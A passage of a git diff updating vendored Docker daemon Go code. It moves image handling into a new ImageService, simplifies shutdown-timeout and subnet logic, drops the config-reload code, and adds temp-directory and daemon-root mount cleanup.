+	// initialized, the daemon is registered and we can store the discovery backend as it's read-only
 	if err := d.initDiscovery(config); err != nil {
 		return nil, err
 	}
@@ -673,36 +838,46 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot
 	// Check if Devices cgroup is mounted, it is hard requirement for container security,
 	// on Linux.
 	if runtime.GOOS == "linux" && !sysInfo.CgroupDevicesEnabled {
-		return nil, fmt.Errorf("Devices cgroup isn't mounted")
+		return nil, errors.New("Devices cgroup isn't mounted")
 	}
 
 	d.ID = trustKey.PublicKey().KeyID()
 	d.repository = daemonRepo
 	d.containers = container.NewMemoryStore()
+	if d.containersReplica, err = container.NewViewDB(); err != nil {
+		return nil, err
+	}
 	d.execCommands = exec.NewStore()
-	d.referenceStore = referenceStore
-	d.distributionMetadataStore = distributionMetadataStore
-	d.trustKey = trustKey
 	d.idIndex = truncindex.NewTruncIndex([]string{})
 	d.statsCollector = d.newStatsCollector(1 * time.Second)
-	d.defaultLogConfig = containertypes.LogConfig{
-		Type:   config.LogConfig.Type,
-		Config: config.LogConfig.Config,
-	}
-	d.EventsService = eventsService
-	d.volumes = volStore
+
+	d.EventsService = events.New()
 	d.root = config.Root
-	d.uidMaps = uidMaps
-	d.gidMaps = gidMaps
+	d.idMappings = idMappings
 	d.seccompEnabled = sysInfo.Seccomp
+	d.apparmorEnabled = sysInfo.AppArmor
 
-	d.nameIndex = registrar.NewRegistrar()
 	d.linkIndex = newLinkIndex()
-	d.containerdRemote = containerdRemote
+
+	// TODO: imageStore, distributionMetadataStore, and ReferenceStore are only
+	// used above to run migration. They could be initialized in ImageService
+	// if migration is called from daemon/images. layerStore might move as well.
+	d.imageService = images.NewImageService(images.ImageServiceConfig{
+		ContainerStore:            d.containers,
+		DistributionMetadataStore: distributionMetadataStore,
+		EventsService:             d.EventsService,
+		ImageStore:                imageStore,
+		LayerStores:               layerStores,
+		MaxConcurrentDownloads:    *config.MaxConcurrentDownloads,
+		MaxConcurrentUploads:      *config.MaxConcurrentUploads,
+		ReferenceStore:            rs,
+		RegistryService:           registryService,
+		TrustKey:                  trustKey,
+	})
 
 	go d.execCommandGC()
 
-	d.containerd, err = containerdRemote.Client(d)
+	d.containerd, err = containerdRemote.NewClient(ContainersNamespace, d)
 	if err != nil {
 		return nil, err
 	}
@@ -710,91 +885,90 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot
 	if err := d.restore(); err != nil {
 		return nil, err
 	}
+	close(d.startupDone)
 
 	// FIXME: this method never returns an error
 	info, _ := d.SystemInfo()
 
-	engineVersion.WithValues(
+	engineInfo.WithValues(
 		dockerversion.Version,
 		dockerversion.GitCommit,
 		info.Architecture,
 		info.Driver,
 		info.KernelVersion,
 		info.OperatingSystem,
+		info.OSType,
+		info.ID,
 	).Set(1)
 	engineCpus.Set(float64(info.NCPU))
 	engineMemory.Set(float64(info.MemTotal))
 
-	// set up SIGUSR1 handler on Unix-like systems, or a Win32 global event
-	// on Windows to dump Go routine stacks
-	stackDumpDir := config.Root
-	if execRoot := config.GetExecRoot(); execRoot != "" {
-		stackDumpDir = execRoot
+	gd := ""
+	for os, driver := range d.graphDrivers {
+		if len(gd) > 0 {
+			gd += ", "
+		}
+		gd += driver
+		if len(d.graphDrivers) > 1 {
+			gd = fmt.Sprintf("%s (%s)", gd, os)
+		}
 	}
-	d.setupDumpStackTrap(stackDumpDir)
+	logrus.WithFields(logrus.Fields{
+		"version":        dockerversion.Version,
+		"commit":         dockerversion.GitCommit,
+		"graphdriver(s)": gd,
+	}).Info("Docker daemon")
 
 	return d, nil
 }
 
+// DistributionServices returns services controlling daemon storage
+func (daemon *Daemon) DistributionServices() images.DistributionServices {
+	return daemon.imageService.DistributionServices()
+}
+
+func (daemon *Daemon) waitForStartupDone() {
+	<-daemon.startupDone
+}
+
 func (daemon *Daemon) shutdownContainer(c *container.Container) error {
 	stopTimeout := c.StopTimeout()
-	// TODO(windows): Handle docker restart with paused containers
-	if c.IsPaused() {
-		// To terminate a process in freezer cgroup, we should send
-		// SIGTERM to this process then unfreeze it, and the process will
-		// force to terminate immediately.
-		logrus.Debugf("Found container %s is paused, sending SIGTERM before unpausing it", c.ID)
-		sig, ok := signal.SignalMap["TERM"]
-		if !ok {
-			return fmt.Errorf("System does not support SIGTERM")
-		}
-		if err := daemon.kill(c, int(sig)); err != nil {
-			return fmt.Errorf("sending SIGTERM to container %s with error: %v", c.ID, err)
-		}
-		if err := daemon.containerUnpause(c); err != nil {
-			return fmt.Errorf("Failed to unpause container %s with error: %v", c.ID, err)
-		}
-		if _, err := c.WaitStop(time.Duration(stopTimeout) * time.Second); err != nil {
-			logrus.Debugf("container %s failed to exit in %d second of SIGTERM, sending SIGKILL to force", c.ID, stopTimeout)
-			sig, ok := signal.SignalMap["KILL"]
-			if !ok {
-				return fmt.Errorf("System does not support SIGKILL")
-			}
-			if err := daemon.kill(c, int(sig)); err != nil {
-				logrus.Errorf("Failed to SIGKILL container %s", c.ID)
-			}
-			c.WaitStop(-1 * time.Second)
-			return err
-		}
-	}
+
 	// If container failed to exit in stopTimeout seconds of SIGTERM, then using the force
 	if err := daemon.containerStop(c, stopTimeout); err != nil {
 		return fmt.Errorf("Failed to stop container %s with error: %v", c.ID, err)
 	}
 
-	c.WaitStop(-1 * time.Second)
+	// Wait without timeout for the container to exit.
+	// Ignore the result.
+	<-c.Wait(context.Background(), container.WaitConditionNotRunning)
 	return nil
 }
 
-// ShutdownTimeout returns the shutdown timeout based on the max stopTimeout of the containers,
-// and is limited by daemon's ShutdownTimeout.
+// ShutdownTimeout returns the timeout (in seconds) before containers are forcibly
+// killed during shutdown. The default timeout can be configured both on the daemon
+// and per container, and the longest timeout will be used. A grace-period of
+// 5 seconds is added to the configured timeout.
+//
+// A negative (-1) timeout means "indefinitely", which means that containers
+// are not forcibly killed, and the daemon shuts down after all containers exit.
 func (daemon *Daemon) ShutdownTimeout() int {
-	// By default we use daemon's ShutdownTimeout.
 	shutdownTimeout := daemon.configStore.ShutdownTimeout
+	if shutdownTimeout < 0 {
+		return -1
+	}
+	if daemon.containers == nil {
+		return shutdownTimeout
+	}
 
 	graceTimeout := 5
-	if daemon.containers != nil {
-		for _, c := range daemon.containers.List() {
-			if shutdownTimeout >= 0 {
-				stopTimeout := c.StopTimeout()
-				if stopTimeout < 0 {
-					shutdownTimeout = -1
-				} else {
-					if stopTimeout+graceTimeout > shutdownTimeout {
-						shutdownTimeout = stopTimeout + graceTimeout
-					}
-				}
-			}
+	for _, c := range daemon.containers.List() {
+		stopTimeout := c.StopTimeout()
+		if stopTimeout < 0 {
+			return -1
+		}
+		if stopTimeout+graceTimeout > shutdownTimeout {
+			shutdownTimeout = stopTimeout + graceTimeout
 		}
 	}
 	return shutdownTimeout
@@ -809,12 +983,15 @@ func (daemon *Daemon) Shutdown() error {
 	if daemon.configStore.LiveRestoreEnabled && daemon.containers != nil {
 		// check if there are any running containers, if none we should do some cleanup
 		if ls, err := daemon.Containers(&types.ContainerListOptions{}); len(ls) != 0 || err != nil {
+			// metrics plugins still need some cleanup
+			daemon.cleanupMetricsPlugins()
 			return nil
 		}
 	}
 
 	if daemon.containers != nil {
-		logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.configStore.ShutdownTimeout)
+		logrus.Debugf("daemon configured with a %d seconds minimum shutdown timeout", daemon.configStore.ShutdownTimeout)
+		logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.ShutdownTimeout())
 		daemon.containers.ApplyAll(func(c *container.Container) {
 			if !c.IsRunning() {
 				return
@@ -824,7 +1001,7 @@ func (daemon *Daemon) Shutdown() error {
 				logrus.Errorf("Stop container error: %v", err)
 				return
 			}
-			if mountid, err := daemon.layerStore.GetMountID(c.ID); err == nil {
+			if mountid, err := daemon.imageService.GetLayerMountID(c.ID, c.OS); err == nil {
 				daemon.cleanupMountsByID(mountid)
 			}
 			logrus.Debugf("container stopped %s", c.ID)
@@ -837,12 +1014,18 @@ func (daemon *Daemon) Shutdown() error {
 		}
 	}
 
-	if daemon.layerStore != nil {
-		if err := daemon.layerStore.Cleanup(); err != nil {
-			logrus.Errorf("Error during layer Store.Cleanup(): %v", err)
-		}
+	if daemon.imageService != nil {
+		daemon.imageService.Cleanup()
 	}
 
+	// If we are part of a cluster, clean up cluster's stuff
+	if daemon.clusterProvider != nil {
+		logrus.Debugf("start clean shutdown of cluster resources...")
+		daemon.DaemonLeavesCluster()
+	}
+
+	daemon.cleanupMetricsPlugins()
+
 	// Shutdown plugins after containers and layerstore. Don't change the order.
 	daemon.pluginShutdown()
 
@@ -851,30 +1034,29 @@ func (daemon *Daemon) Shutdown() error {
 		daemon.netController.Stop()
 	}
 
-	if err := daemon.cleanupMounts(); err != nil {
-		return err
-	}
-
-	return nil
+	return daemon.cleanupMounts()
 }
 
 // Mount sets container.BaseFS
 // (is it not set coming in? why is it unset?)
 func (daemon *Daemon) Mount(container *container.Container) error {
+	if container.RWLayer == nil {
+		return errors.New("RWLayer of container " + container.ID + " is unexpectedly nil")
+	}
 	dir, err := container.RWLayer.Mount(container.GetMountLabel())
 	if err != nil {
 		return err
 	}
 	logrus.Debugf("container mounted via layerStore: %v", dir)
 
-	if container.BaseFS != dir {
+	if container.BaseFS != nil && container.BaseFS.Path() != dir.Path() {
 		// The mount path reported by the graph driver should always be trusted on Windows, since the
 		// volume path for a given mounted layer may change over time.  This should only be an error
 		// on non-Windows operating systems.
-		if container.BaseFS != "" && runtime.GOOS != "windows" {
+		if runtime.GOOS != "windows" {
 			daemon.Unmount(container)
 			return fmt.Errorf("Error: driver %s is returning inconsistent paths for container %s ('%s' then '%s')",
-				daemon.GraphDriverName(), container.ID, container.BaseFS, dir)
+				daemon.imageService.GraphDriverForOS(container.OS), container.ID, container.BaseFS, dir)
 		}
 	}
 	container.BaseFS = dir // TODO: combine these fields
@@ -883,6 +1065,9 @@ func (daemon *Daemon) Mount(container *container.Container) error {
 
 // Unmount unsets the container base filesystem
 func (daemon *Daemon) Unmount(container *container.Container) error {
+	if container.RWLayer == nil {
+		return errors.New("RWLayer of container " + container.ID + " is unexpectedly nil")
+	}
 	if err := container.RWLayer.Unmount(); err != nil {
 		logrus.Errorf("Error unmounting container %s: %s", container.ID, err)
 		return err
@@ -891,96 +1076,73 @@ func (daemon *Daemon) Unmount(container *container.Container) error {
 	return nil
 }
 
-// V4Subnets returns the IPv4 subnets of networks that are managed by Docker.
-func (daemon *Daemon) V4Subnets() []net.IPNet {
-	var subnets []net.IPNet
+// Subnets return the IPv4 and IPv6 subnets of networks that are manager by Docker.
+func (daemon *Daemon) Subnets() ([]net.IPNet, []net.IPNet) {
+	var v4Subnets []net.IPNet
+	var v6Subnets []net.IPNet
 
 	managedNetworks := daemon.netController.Networks()
 
 	for _, managedNetwork := range managedNetworks {
-		v4Infos, _ := managedNetwork.Info().IpamInfo()
-		for _, v4Info := range v4Infos {
-			if v4Info.IPAMData.Pool != nil {
-				subnets = append(subnets, *v4Info.IPAMData.Pool)
+		v4infos, v6infos := managedNetwork.Info().IpamInfo()
+		for _, info := range v4infos {
+			if info.IPAMData.Pool != nil {
+				v4Subnets = append(v4Subnets, *info.IPAMData.Pool)
 			}
 		}
-	}
-
-	return subnets
-}
-
-// V6Subnets returns the IPv6 subnets of networks that are managed by Docker.
-func (daemon *Daemon) V6Subnets() []net.IPNet {
-	var subnets []net.IPNet
-
-	managedNetworks := daemon.netController.Networks()
-
-	for _, managedNetwork := range managedNetworks {
-		_, v6Infos := managedNetwork.Info().IpamInfo()
-		for _, v6Info := range v6Infos {
-			if v6Info.IPAMData.Pool != nil {
-				subnets = append(subnets, *v6Info.IPAMData.Pool)
+		for _, info := range v6infos {
+			if info.IPAMData.Pool != nil {
+				v6Subnets = append(v6Subnets, *info.IPAMData.Pool)
 			}
 		}
 	}
 
-	return subnets
-}
-
-// GraphDriverName returns the name of the graph driver used by the layer.Store
-func (daemon *Daemon) GraphDriverName() string {
-	return daemon.layerStore.DriverName()
-}
-
-// GetUIDGIDMaps returns the current daemon's user namespace settings
-// for the full uid and gid maps which will be applied to containers
-// started in this instance.
-func (daemon *Daemon) GetUIDGIDMaps() ([]idtools.IDMap, []idtools.IDMap) {
-	return daemon.uidMaps, daemon.gidMaps
+	return v4Subnets, v6Subnets
 }
 
-// GetRemappedUIDGID returns the current daemon's uid and gid values
-// if user namespaces are in use for this daemon instance.  If not
-// this function will return "real" root values of 0, 0.
-func (daemon *Daemon) GetRemappedUIDGID() (int, int) {
-	uid, gid, _ := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps)
-	return uid, gid
-}
-
-// tempDir returns the default directory to use for temporary files.
-func tempDir(rootDir string, rootUID, rootGID int) (string, error) {
+// prepareTempDir prepares and returns the default directory to use
+// for temporary files.
+// If it doesn't exist, it is created. If it exists, its content is removed.
+func prepareTempDir(rootDir string, rootIDs idtools.IDPair) (string, error) {
 	var tmpDir string
 	if tmpDir = os.Getenv("DOCKER_TMPDIR"); tmpDir == "" {
 		tmpDir = filepath.Join(rootDir, "tmp")
+		newName := tmpDir + "-old"
+		if err := os.Rename(tmpDir, newName); err == nil {
+			go func() {
+				if err := os.RemoveAll(newName); err != nil {
+					logrus.Warnf("failed to delete old tmp directory: %s", newName)
+				}
+			}()
+		} else if !os.IsNotExist(err) {
+			logrus.Warnf("failed to rename %s for background deletion: %s. Deleting synchronously", tmpDir, err)
+			if err := os.RemoveAll(tmpDir); err != nil {
+				logrus.Warnf("failed to delete old tmp directory: %s", tmpDir)
+			}
+		}
 	}
-	return tmpDir, idtools.MkdirAllAs(tmpDir, 0700, rootUID, rootGID)
-}
-
-func (daemon *Daemon) setupInitLayer(initPath string) error {
-	rootUID, rootGID := daemon.GetRemappedUIDGID()
-	return initlayer.Setup(initPath, rootUID, rootGID)
-}
-
-func setDefaultMtu(config *Config) {
-	// do nothing if the config does not have the default 0 value.
-	if config.Mtu != 0 {
-		return
-	}
-	config.Mtu = defaultNetworkMtu
+	// We don't remove the content of tmpdir if it's not the default,
+	// it may hold things that do not belong to us.
+	return tmpDir, idtools.MkdirAllAndChown(tmpDir, 0700, rootIDs)
 }
 
-func (daemon *Daemon) configureVolumes(rootUID, rootGID int) (*store.VolumeStore, error) {
-	volumesDriver, err := local.New(daemon.configStore.Root, rootUID, rootGID)
+func (daemon *Daemon) setGenericResources(conf *config.Config) error {
+	genericResources, err := config.ParseGenericResources(conf.NodeGenericResources)
 	if err != nil {
-		return nil, err
+		return err
 	}
 
-	volumedrivers.RegisterPluginGetter(daemon.PluginStore)
+	daemon.genericResources = genericResources
 
-	if !volumedrivers.Register(volumesDriver, volumesDriver.Name()) {
-		return nil, fmt.Errorf("local volume driver could not be registered")
+	return nil
+}
+
+func setDefaultMtu(conf *config.Config) {
+	// do nothing if the config does not have the default 0 value.
+	if conf.Mtu != 0 {
+		return
 	}
-	return store.New(daemon.configStore.Root)
+	conf.Mtu = config.DefaultNetworkMtu
 }
 
 // IsShuttingDown tells whether the daemon is shutting down or not
@@ -989,17 +1151,17 @@ func (daemon *Daemon) IsShuttingDown() bool {
 }
 
 // initDiscovery initializes the discovery watcher for this daemon.
-func (daemon *Daemon) initDiscovery(config *Config) error {
-	advertise, err := parseClusterAdvertiseSettings(config.ClusterStore, config.ClusterAdvertise)
+func (daemon *Daemon) initDiscovery(conf *config.Config) error {
+	advertise, err := config.ParseClusterAdvertiseSettings(conf.ClusterStore, conf.ClusterAdvertise)
 	if err != nil {
-		if err == errDiscoveryDisabled {
+		if err == discovery.ErrDiscoveryDisabled {
 			return nil
 		}
 		return err
 	}
 
-	config.ClusterAdvertise = advertise
-	discoveryWatcher, err := initDiscovery(config.ClusterStore, config.ClusterAdvertise, config.ClusterOpts)
+	conf.ClusterAdvertise = advertise
+	discoveryWatcher, err := discovery.Init(conf.ClusterStore, conf.ClusterAdvertise, conf.ClusterOpts)
 	if err != nil {
 		return fmt.Errorf("discovery initialization failed (%v)", err)
 	}
@@ -1008,199 +1170,11 @@ func (daemon *Daemon) initDiscovery(config *Config) error {
 	return nil
 }
 
-// Reload reads configuration changes and modifies the
-// daemon according to those changes.
-// These are the settings that Reload changes:
-// - Daemon labels.
-// - Daemon debug log level.
-// - Daemon insecure registries.
-// - Daemon max concurrent downloads
-// - Daemon max concurrent uploads
-// - Cluster discovery (reconfigure and restart).
-// - Daemon live restore
-// - Daemon shutdown timeout (in seconds).
-func (daemon *Daemon) Reload(config *Config) (err error) {
-
-	daemon.configStore.reloadLock.Lock()
-
-	attributes := daemon.platformReload(config)
-
-	defer func() {
-		// we're unlocking here, because
-		// LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes()
-		// holds that lock too.
-		daemon.configStore.reloadLock.Unlock()
-		if err == nil {
-			daemon.LogDaemonEventWithAttributes("reload", attributes)
-		}
-	}()
-
-	if err := daemon.reloadClusterDiscovery(config); err != nil {
-		return err
-	}
-
-	if config.IsValueSet("labels") {
-		daemon.configStore.Labels = config.Labels
-	}
-	if config.IsValueSet("debug") {
-		daemon.configStore.Debug = config.Debug
-	}
-	if config.IsValueSet("insecure-registries") {
-		daemon.configStore.InsecureRegistries = config.InsecureRegistries
-		if err := daemon.RegistryService.LoadInsecureRegistries(config.InsecureRegistries); err != nil {
-			return err
-		}
-	}
-	if config.IsValueSet("live-restore") {
-		daemon.configStore.LiveRestoreEnabled = config.LiveRestoreEnabled
-		if err := daemon.containerdRemote.UpdateOptions(libcontainerd.WithLiveRestore(config.LiveRestoreEnabled)); err != nil {
-			return err
-		}
-	}
-
-	// If no value is set for max-concurrent-downloads we assume it is the default value
-	// We always "reset" as the cost is lightweight and easy to maintain.
-	if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil {
-		*daemon.configStore.MaxConcurrentDownloads = *config.MaxConcurrentDownloads
-	} else {
-		maxConcurrentDownloads := defaultMaxConcurrentDownloads
-		daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads
-	}
-	logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads)
-	if daemon.downloadManager != nil {
-		daemon.downloadManager.SetConcurrency(*daemon.configStore.MaxConcurrentDownloads)
-	}
-
-	// If no value is set for max-concurrent-upload we assume it is the default value
-	// We always "reset" as the cost is lightweight and easy to maintain.
-	if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil {
-		*daemon.configStore.MaxConcurrentUploads = *config.MaxConcurrentUploads
-	} else {
-		maxConcurrentUploads := defaultMaxConcurrentUploads
-		daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads
-	}
-	logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads)
-	if daemon.uploadManager != nil {
-		daemon.uploadManager.SetConcurrency(*daemon.configStore.MaxConcurrentUploads)
-	}
-
-	if config.IsValueSet("shutdown-timeout") {
-		daemon.configStore.ShutdownTimeout = config.ShutdownTimeout
-		logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout)
-	}
-
-	// We emit daemon reload event here with updatable configurations
-	attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug)
-	attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled)
-
-	if daemon.configStore.InsecureRegistries != nil {
-		insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries)
-		if err != nil {
-			return err
-		}
-		attributes["insecure-registries"] = string(insecureRegistries)
-	} else {
-		attributes["insecure-registries"] = "[]"
-	}
-
-	attributes["cluster-store"] = daemon.configStore.ClusterStore
-	if daemon.configStore.ClusterOpts != nil {
-		opts, err := json.Marshal(daemon.configStore.ClusterOpts)
-		if err != nil {
-			return err
-		}
-		attributes["cluster-store-opts"] = string(opts)
-	} else {
-		attributes["cluster-store-opts"] = "{}"
-	}
-	attributes["cluster-advertise"] = daemon.configStore.ClusterAdvertise
-
-	if daemon.configStore.Labels != nil {
-		labels, err := json.Marshal(daemon.configStore.Labels)
-		if err != nil {
-			return err
-		}
-		attributes["labels"] = string(labels)
-	} else {
-		attributes["labels"] = "[]"
-	}
-
-	attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads)
-	attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentUploads)
-	attributes["shutdown-timeout"] = fmt.Sprintf("%d", daemon.configStore.ShutdownTimeout)
-
-	return nil
-}
-
-func (daemon *Daemon) reloadClusterDiscovery(config *Config) error {
-	var err error
-	newAdvertise := daemon.configStore.ClusterAdvertise
-	newClusterStore := daemon.configStore.ClusterStore
-	if config.IsValueSet("cluster-advertise") {
-		if config.IsValueSet("cluster-store") {
-			newClusterStore = config.ClusterStore
-		}
-		newAdvertise, err = parseClusterAdvertiseSettings(newClusterStore, config.ClusterAdvertise)
-		if err != nil && err != errDiscoveryDisabled {
-			return err
-		}
-	}
-
-	if daemon.clusterProvider != nil {
-		if err := config.isSwarmCompatible(); err != nil {
-			return err
-		}
-	}
-
-	// check discovery modifications
-	if !modifiedDiscoverySettings(daemon.configStore, newAdvertise, newClusterStore, config.ClusterOpts) {
-		return nil
-	}
-
-	// enable discovery for the first time if it was not previously enabled
-	if daemon.discoveryWatcher == nil {
-		discoveryWatcher, err := initDiscovery(newClusterStore, newAdvertise, config.ClusterOpts)
-		if err != nil {
-			return fmt.Errorf("discovery initialization failed (%v)", err)
-		}
-		daemon.discoveryWatcher = discoveryWatcher
-	} else {
-		if err == errDiscoveryDisabled {
-			// disable discovery if it was previously enabled and it's disabled now
-			daemon.discoveryWatcher.Stop()
-		} else {
-			// reload discovery
-			if err = daemon.discoveryWatcher.Reload(config.ClusterStore, newAdvertise, config.ClusterOpts); err != nil {
-				return err
-			}
-		}
-	}
-
-	daemon.configStore.ClusterStore = newClusterStore
-	daemon.configStore.ClusterOpts = config.ClusterOpts
-	daemon.configStore.ClusterAdvertise = newAdvertise
-
-	if daemon.netController == nil {
-		return nil
-	}
-	netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil)
-	if err != nil {
-		logrus.WithError(err).Warnf("failed to get options with network controller")
-		return nil
-	}
-	err = daemon.netController.ReloadConfiguration(netOptions...)
-	if err != nil {
-		logrus.Warnf("Failed to reload configuration with network controller: %v", err)
-	}
-
-	return nil
-}
-
-func isBridgeNetworkDisabled(config *Config) bool {
-	return config.bridgeConfig.Iface == disableNetworkBridge
+func isBridgeNetworkDisabled(conf *config.Config) bool {
+	return conf.BridgeConfig.Iface == config.DisableNetworkBridge
 }
 
-func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) {
+func (daemon *Daemon) networkOptions(dconfig *config.Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) {
 	options := []nwconfig.Option{}
 	if dconfig == nil {
 		return options, nil
@@ -1218,7 +1192,7 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett
 	if strings.TrimSpace(dconfig.ClusterStore) != "" {
 		kv := strings.Split(dconfig.ClusterStore, "://")
 		if len(kv) != 2 {
-			return nil, fmt.Errorf("kv store daemon config must be of the form KV-PROVIDER://KV-URL")
+			return nil, errors.New("kv store daemon config must be of the form KV-PROVIDER://KV-URL")
 		}
 		options = append(options, nwconfig.OptionKVProvider(kv[0]))
 		options = append(options, nwconfig.OptionKVProviderURL(kv[1]))
@@ -1238,6 +1212,10 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett
 	options = append(options, nwconfig.OptionLabels(dconfig.Labels))
 	options = append(options, driverOptions(dconfig)...)
 
+	if len(dconfig.NetworkConfig.DefaultAddressPools.Value()) > 0 {
+		options = append(options, nwconfig.OptionDefaultAddressPoolConfig(dconfig.NetworkConfig.DefaultAddressPools.Value()))
+	}
+
 	if daemon.configStore != nil && daemon.configStore.LiveRestoreEnabled && len(activeSandboxes) != 0 {
 		options = append(options, nwconfig.OptionActiveSandboxes(activeSandboxes))
 	}
@@ -1246,20 +1224,9 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett
 		options = append(options, nwconfig.OptionPluginGetter(pg))
 	}
 
-	return options, nil
-}
+	options = append(options, nwconfig.OptionNetworkControlPlaneMTU(dconfig.NetworkControlPlaneMTU))
 
-func copyBlkioEntry(entries []*containerd.BlkioStatsEntry) []types.BlkioStatEntry {
-	out := make([]types.BlkioStatEntry, len(entries))
-	for i, re := range entries {
-		out[i] = types.BlkioStatEntry{
-			Major: re.Major,
-			Minor: re.Minor,
-			Op:    re.Op,
-			Value: re.Value,
-		}
-	}
-	return out
+	return options, nil
 }
 
 // GetCluster returns the cluster
@@ -1292,30 +1259,62 @@ func (daemon *Daemon) PluginGetter() *plugin.Store {
 }
 
 // CreateDaemonRoot creates the root for the daemon
-func CreateDaemonRoot(config *Config) error {
+func CreateDaemonRoot(config *config.Config) error {
 	// get the canonical path to the Docker root directory
 	var realRoot string
 	if _, err := os.Stat(config.Root); err != nil && os.IsNotExist(err) {
 		realRoot = config.Root
 	} else {
-		realRoot, err = fileutils.ReadSymlinkedDirectory(config.Root)
+		realRoot, err = getRealPath(config.Root)
 		if err != nil {
 			return fmt.Errorf("Unable to get the full path to root (%s): %s", config.Root, err)
 		}
 	}
 
-	uidMaps, gidMaps, err := setupRemappedRoot(config)
+	idMappings, err := setupRemappedRoot(config)
 	if err != nil {
 		return err
 	}
-	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
-	if err != nil {
-		return err
+	return setupDaemonRoot(config, realRoot, idMappings.RootPair())
+}
+
+// checkpointAndSave grabs a container lock to safely call container.CheckpointTo
+func (daemon *Daemon) checkpointAndSave(container *container.Container) error {
+	container.Lock()
+	defer container.Unlock()
+	if err := container.CheckpointTo(daemon.containersReplica); err != nil {
+		return fmt.Errorf("Error saving container state: %v", err)
 	}
+	return nil
+}
 
-	if err := setupDaemonRoot(config, realRoot, rootUID, rootGID); err != nil {
-		return err
+// because the CLI sends a -1 when it wants to unset the swappiness value
+// we need to clear it on the server side
+func fixMemorySwappiness(resources *containertypes.Resources) {
+	if resources.MemorySwappiness != nil && *resources.MemorySwappiness == -1 {
+		resources.MemorySwappiness = nil
 	}
+}
 
-	return nil
+// GetAttachmentStore returns current attachment store associated with the daemon
+func (daemon *Daemon) GetAttachmentStore() *network.AttachmentStore {
+	return &daemon.attachmentStore
+}
+
+// IDMappings returns uid/gid mappings for the builder
+func (daemon *Daemon) IDMappings() *idtools.IDMappings {
+	return daemon.idMappings
+}
+
+// ImageService returns the Daemon's ImageService
+func (daemon *Daemon) ImageService() *images.ImageService {
+	return daemon.imageService
+}
+
+// BuilderBackend returns the backend used by builder
+func (daemon *Daemon) BuilderBackend() builder.Backend {
+	return struct {
+		*Daemon
+		*images.ImageService
+	}{daemon, daemon.imageService}
 }
diff --git a/vendor/github.com/docker/docker/daemon/daemon_experimental.go b/vendor/github.com/docker/docker/daemon/daemon_experimental.go
deleted file mode 100644
index fb0251d4af..0000000000
--- a/vendor/github.com/docker/docker/daemon/daemon_experimental.go
+++ /dev/null
@@ -1,7 +0,0 @@
-package daemon
-
-import "github.com/docker/docker/api/types/container"
-
-func (daemon *Daemon) verifyExperimentalContainerSettings(hostConfig *container.HostConfig, config *container.Config) ([]string, error) {
-	return nil, nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux.go b/vendor/github.com/docker/docker/daemon/daemon_linux.go
index 9bdf6e2b79..7cb6727534 100644
--- a/vendor/github.com/docker/docker/daemon/daemon_linux.go
+++ b/vendor/github.com/docker/docker/daemon/daemon_linux.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"bufio"
@@ -8,10 +8,20 @@ import (
 	"regexp"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/fileutils"
 	"github.com/docker/docker/pkg/mount"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
+// On Linux, plugins use a static path for storing execution state,
+// instead of deriving path from daemon's exec-root. This is because
+// plugin socket files are created here and they cannot exceed max
+// path length of 108 bytes.
+func getPluginExecRoot(root string) string {
+	return "/run/docker/plugins"
+}
+
 func (daemon *Daemon) cleanupMountsByID(id string) error {
 	logrus.Debugf("Cleaning up old mountid %s: start.", id)
 	f, err := os.Open("/proc/self/mountinfo")
@@ -58,9 +68,41 @@ func (daemon *Daemon) cleanupMountsFromReaderByID(reader io.Reader, id string, u
 	return nil
 }
 
-// cleanupMounts umounts shm/mqueue mounts for old containers
+// cleanupMounts umounts used by container resources and the daemon root mount
 func (daemon *Daemon) cleanupMounts() error {
-	return daemon.cleanupMountsByID("")
+	if err := daemon.cleanupMountsByID(""); err != nil {
+		return err
+	}
+
+	info, err := mount.GetMounts(mount.SingleEntryFilter(daemon.root))
+	if err != nil {
+		return errors.Wrap(err, "error reading mount table for cleanup")
+	}
+
+	if len(info) < 1 {
+		// no mount found, we're done here
+		return nil
+	}
+
+	// `info.Root` here is the root mountpoint of the passed in path (`daemon.root`).
+	// The ony cases that need to be cleaned up is when the daemon has performed a
+	//   `mount --bind /daemon/root /daemon/root && mount --make-shared /daemon/root`
+	// This is only done when the daemon is started up and `/daemon/root` is not
+	// already on a shared mountpoint.
+	if !shouldUnmountRoot(daemon.root, info[0]) {
+		return nil
+	}
+
+	unmountFile := getUnmountOnShutdownPath(daemon.configStore)
+	if _, err := os.Stat(unmountFile); err != nil {
+		return nil
+	}
+
+	logrus.WithField("mountpoint", daemon.root).Debug("unmounting daemon root")
